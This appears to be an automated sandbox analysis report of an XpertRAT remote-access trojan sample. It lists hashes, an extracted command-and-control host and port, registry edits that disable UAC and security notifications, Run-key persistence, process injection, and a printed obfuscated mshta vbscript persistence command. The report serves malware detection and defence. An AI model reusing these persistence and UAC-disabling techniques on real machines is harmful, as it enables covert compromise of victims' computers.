Analysis
-
max time kernel
148s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
27/01/2025, 13:31
Static task
static1
Behavioral task
behavioral1
Sample
2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe
Resource
win10v2004-20241007-en
General
-
Target
2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe
-
Size
744KB
-
MD5
6c6a9c70763f799ac9d4ca55a292c3f4
-
SHA1
af4ebcfdd1624a077cd0f1a1c77f04076a974714
-
SHA256
2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17
-
SHA512
d21fc33c06169f58735333d95455636dfe0054021c884fa01df846d4bf0fd1085982475f47b0aba26ba782d66ce10317eadc34c6d3a28f8bd458c2ffda6231fc
-
SSDEEP
12288:VzukkVr/MhE6JOA6lfHcb+L1LkUrzx0E+qKlR5yaMxTEaD:NhE6JOAiPVgUrCvR5yaMxTEaD
Malware Config
Extracted
xpertrat
3.1.9
Group
joeing.dnsfor.me:2011
P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5
Signatures
-
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" OPHAVSRETTEN.exe -
Windows security bypass 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0" OPHAVSRETTEN.exe -
XpertRAT Core payload 3 IoCs
resource yara_rule behavioral1/memory/2948-23-0x0000000000400000-0x0000000000444000-memory.dmp xpertrat behavioral1/memory/2948-25-0x0000000000400000-0x0000000000444000-memory.dmp xpertrat behavioral1/memory/2948-36-0x0000000000400000-0x0000000000444000-memory.dmp xpertrat -
Xpertrat family
-
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run OPHAVSRETTEN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 = "C:\\Users\\Admin\\AppData\\Roaming\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5.exe" OPHAVSRETTEN.exe -
Executes dropped EXE 3 IoCs
pid Process 2740 OPHAVSRETTEN.exe 2728 OPHAVSRETTEN.exe 2948 OPHAVSRETTEN.exe -
Loads dropped DLL 4 IoCs
pid Process 2920 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe 2920 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe 2740 OPHAVSRETTEN.exe 2728 OPHAVSRETTEN.exe -
Windows security modification 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0" OPHAVSRETTEN.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 = "C:\\Users\\Admin\\AppData\\Roaming\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5.exe" OPHAVSRETTEN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 = "C:\\Users\\Admin\\AppData\\Roaming\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5.exe" OPHAVSRETTEN.exe -
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" OPHAVSRETTEN.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2740 set thread context of 2728 2740 OPHAVSRETTEN.exe 30 PID 2728 set thread context of 2948 2728 OPHAVSRETTEN.exe 31 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OPHAVSRETTEN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OPHAVSRETTEN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OPHAVSRETTEN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2728 OPHAVSRETTEN.exe 2728 OPHAVSRETTEN.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2948 OPHAVSRETTEN.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 2920 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe 2740 OPHAVSRETTEN.exe 2728 OPHAVSRETTEN.exe 2948 OPHAVSRETTEN.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2920 wrote to memory of 2600 2920 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe 28 PID 2920 wrote to memory of 2600 2920 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe 28 PID 2920 wrote to memory of 2600 2920 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe 28 PID 2920 wrote to memory of 2600 2920 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe 28 PID 2920 wrote to memory of 2740 2920 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe 29 PID 2920 wrote to memory of 2740 2920 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe 29 PID 2920 wrote to memory of 2740 2920 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe 29 PID 2920 wrote to memory of 2740 2920 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe 29 PID 2740 wrote to memory of 2728 2740 OPHAVSRETTEN.exe 30 PID 2740 wrote to memory of 2728 2740 OPHAVSRETTEN.exe 30 PID 2740 wrote to memory of 2728 2740 OPHAVSRETTEN.exe 30 PID 2740 wrote to memory of 2728 2740 OPHAVSRETTEN.exe 30 PID 2740 wrote to memory of 2728 2740 OPHAVSRETTEN.exe 30 PID 2740 wrote to memory of 2728 2740 OPHAVSRETTEN.exe 30 PID 2740 wrote to memory of 2728 2740 OPHAVSRETTEN.exe 30 PID 2740 wrote to memory of 2728 2740 OPHAVSRETTEN.exe 30 PID 2740 wrote to memory of 2728 2740 OPHAVSRETTEN.exe 30 PID 2740 wrote to memory of 2728 2740 OPHAVSRETTEN.exe 30 PID 2728 wrote to memory of 2948 2728 OPHAVSRETTEN.exe 31 PID 2728 wrote to memory of 2948 2728 OPHAVSRETTEN.exe 31 PID 2728 wrote to memory of 2948 2728 OPHAVSRETTEN.exe 31 PID 2728 wrote to memory of 2948 2728 OPHAVSRETTEN.exe 31 PID 2728 wrote to memory of 2948 2728 OPHAVSRETTEN.exe 31 PID 2728 wrote to memory of 2948 2728 OPHAVSRETTEN.exe 31 PID 2728 wrote to memory of 2948 2728 OPHAVSRETTEN.exe 31 PID 2728 wrote to memory of 2948 2728 OPHAVSRETTEN.exe 31 PID 2728 wrote to memory of 2948 2728 OPHAVSRETTEN.exe 31 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" OPHAVSRETTEN.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe"C:\Users\Admin\AppData\Local\Temp\2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\:\Run\sprgekasser"" : myKey = ""HKCU\Software\Microsoft\Windows\X\Run\NOME"" : myKey=replace(myKey,"":"",""CurrentVersion"") : WshShell.RegWrite myKey,""C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"",""REG_SZ"" : window.close")2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2600
-
-
C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"3⤵
- UAC bypass
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2728 -
C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exeC:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe4⤵
- Adds policy Run key to start application
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2948
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
3Disable or Modify Tools
3Modify Registry
7Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
744KB
MD541116a2b3b3b0b088a773d7daa201e45
SHA1c10e2a5e1f5278cb32772df1991d3a25dc2eeea8
SHA2561ca110ac8fc54b08f016111bacb5590e7df1d00b10638a1e3690453630505c58
SHA512dae78fd971904bcfc4e59f52be1caa7b6745c82f17b3beba727cd2b021babd72d2e8118b42e8ca697a383251e0c6e0e6560153e143cc6219e7ad7d9a0798270b